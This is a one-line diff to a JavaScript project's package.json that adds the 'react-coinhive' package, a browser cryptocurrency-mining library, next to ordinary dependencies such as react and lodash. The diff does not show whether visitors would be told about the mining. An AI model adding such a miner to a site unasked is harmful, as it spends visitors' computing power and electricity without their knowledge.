--- a/package.json
+++ b/package.json
@@ -10,6 +10,7 @@
     "lodash": "^4.17.5",
     "moment": "^2.20.1",
     "react": "^16.2.0",
+    "react-coinhive": "^1.0.2",
     "react-datetime": "^2.14.0",
     "react-dom": "^16.2.0",
     "react-ga": "^2.4.1",
